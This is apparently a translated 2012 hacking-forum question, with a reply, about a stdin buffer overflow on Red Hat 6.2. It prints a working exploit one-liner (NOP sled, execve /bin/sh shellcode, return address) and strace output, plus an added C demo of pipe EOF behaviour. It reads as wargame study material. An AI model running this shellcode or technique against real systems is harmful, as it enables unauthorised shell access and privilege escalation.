System Hacking

   cd80
   http://cd80.tistory.com
Question about a buffer overflow via standard input

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1572


These are results from a Red Hat 6.2 environment.

[cd80@leaveret cd80]$ perl -e 'print "\x90"x200, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x37, "\x8c\xfc\xff\xbf"' | strace ./vul

When I run it like this, after the shell starts, read(0, "", 4096); gets executed automatically, and I don't understand why it runs.
If I append ;cat and run it, it sits waiting for input at read(0,.
In both cases,
execve("/bin//sh", ["/bin//sh"]ptrace: umoven: Input/output error
does show up.
And I also don't know at what point this ptrace: umoven: Input/output error happens.

Without ;cat:

==============================================================
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 3579
fstat64(0, 0xbffffb20)                  = -1 ENOSYS (Function not implemented)
fstat(0, {st_mode=S_IFIFO|0600, st_size=264, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
read(0, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 4096) = 264
read(0, "", 4096)                       = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0
==============================================================

With ;cat appended:
==============================================================
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 3585
fstat64(0, 0xbffffb20)                  = -1 ENOSYS (Function not implemented)
fstat(0, {st_mode=S_IFIFO|0600, st_size=264, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
read(0, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 4096) = 264
read(0,
==============================================================


Above, when cat is not appended, it looks like read(0, "", 4096); returns 0, which is taken as EOF, and the shell exits.


Q1. I think I saw on stackoverflow.com that gets() copies stdin into the variable and clears stdin; is that right? If so, could that be why the read(1, "", 4096); gets in there? If I just run strace /bin/sh and press Ctrl-D, a similar read(0, "", 512); goes in and it exits.

Q2. Why does that ptrace: umoven: I/O error above occur?

  Hit : 5003     Date : 2012/04/27 10:08
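The two traces differ only in what happens to the pipe's write end after ./vul's gets() has drained it. The 264-byte payload (fstat shows st_size=264, and the first read returns 264) is consumed in one read; the shell that the shellcode execs inherits the same fd 0. If perl was the only writer, its exit closes the write end and the shell's read(0, ..., 4096) returns 0, which sh treats as EOF and exits. With ;cat appended on the producer side, cat still holds the write end, so the same read blocks, which is the dangling `read(0,` in the second trace. The following C program is an added example, not code from the post, that rebuilds that pipe in-process and performs the two reads; the payload is a constructed 264-byte NOP stand-in, and the second read is made non-blocking purely so the "waiting for input" case returns -1/EAGAIN instead of hanging. (On Q2, decoding the posted shellcode: cdq zeroes edx, which is pushed as argv's NULL terminator and then passed as execve's envp, so envp is NULL; the umoven error appears exactly where strace would next print envp, consistent with strace failing to read tracee memory at that pointer.)

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Constructed stand-in for the 264-byte payload the perl one-liner pipes into
 * ./vul (200 NOPs + 23-byte shellcode + 37 NOPs + 4-byte return address).
 * Only its length and the absence of a newline matter for this demo. */
#define PAYLOAD_LEN 264

/* Recreate the pipe that `perl ... | ./vul` sets up.  The payload is written
 * into the write end; if keep_writer_open is 0 the write end is closed, which
 * is what happens when perl exits.  Returns the read end (./vul's fd 0) and
 * stores the still-open write end, or -1, in *writer_fd. */
static int make_stdin_pipe(int keep_writer_open, int *writer_fd)
{
    int fds[2];
    unsigned char payload[PAYLOAD_LEN];

    memset(payload, 0x90, sizeof payload);          /* constructed: NOP sled */
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], payload, sizeof payload) != (ssize_t)PAYLOAD_LEN)
        return -1;
    if (keep_writer_open) {
        *writer_fd = fds[1];                        /* `;cat` keeps it open */
    } else {
        close(fds[1]);                              /* perl exited: no writer */
        *writer_fd = -1;
    }
    return fds[0];
}

/* Step 1 mimics gets() in ./vul draining the pipe: the payload has no newline,
 * so stdio's read(0, buf, 4096) takes all 264 bytes (the `= 264` in the trace).
 * Step 2 is the read(0, ..., 4096) the spawned /bin/sh issues on the same,
 * inherited fd 0.  Returns that second read's result and stores errno in *err.
 * The fd is made non-blocking only so the "waiting for input" case returns
 * -1/EAGAIN instead of hanging the way the real shell does at `read(0,`. */
static ssize_t shell_first_read(int keep_writer_open, int *err)
{
    char buf[4096];
    int writer_fd = -1;
    int fd = make_stdin_pipe(keep_writer_open, &writer_fd);
    ssize_t got, m;

    *err = 0;
    if (fd < 0)
        return -2;

    got = read(fd, buf, sizeof buf);                /* what gets() consumed */
    if (got != (ssize_t)PAYLOAD_LEN) {
        close(fd);
        if (writer_fd >= 0)
            close(writer_fd);
        return -3;
    }

    fcntl(fd, F_SETFL, fcntl(fd, F_GETFL) | O_NONBLOCK);
    m = read(fd, buf, sizeof buf);                  /* the shell's read */
    if (m < 0)
        *err = errno;

    close(fd);
    if (writer_fd >= 0)
        close(writer_fd);
    return m;
}

int main(void)
{
    int err;
    ssize_t r;

    r = shell_first_read(0, &err);
    printf("writer closed (no ;cat): read = %zd%s\n", r,
           r == 0 ? "  -> EOF, sh exits" : "");

    r = shell_first_read(1, &err);
    printf("writer open (;cat):      read = %zd, %s\n", r,
           err == EAGAIN ? "EAGAIN -> would block waiting for input"
                         : strerror(err));
    return 0;
}
```

The same mechanism is why the usual HackerSchool-style invocation wraps the producer as `(perl -e '...'; cat) | ./vul`: cat forwards the terminal into the pipe after the payload, so the shell's reads return typed commands instead of EOF.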



    
멍멍 Since a shell always has to be waiting for user input, I'd guess the read() call runs in an infinite loop. And yes, without cat it sees EOF and exits~ The surest way to tell whether STDIN gets emptied is to check directly before and after the gets() call. Try it with a debugger or dumpcode. The address of the STDIN buffer is in one of the registers: while stopped at gets() during gdb debugging, press ctrl+c and look at the registers. (I think I may have had to do step or next once or twice for it to show up..) The ptrace error also seems to appear as the shell exits.. 2012/05/11
cd80 멍멍//
Thank you, I'll check it again with the method you described.
2012/05/11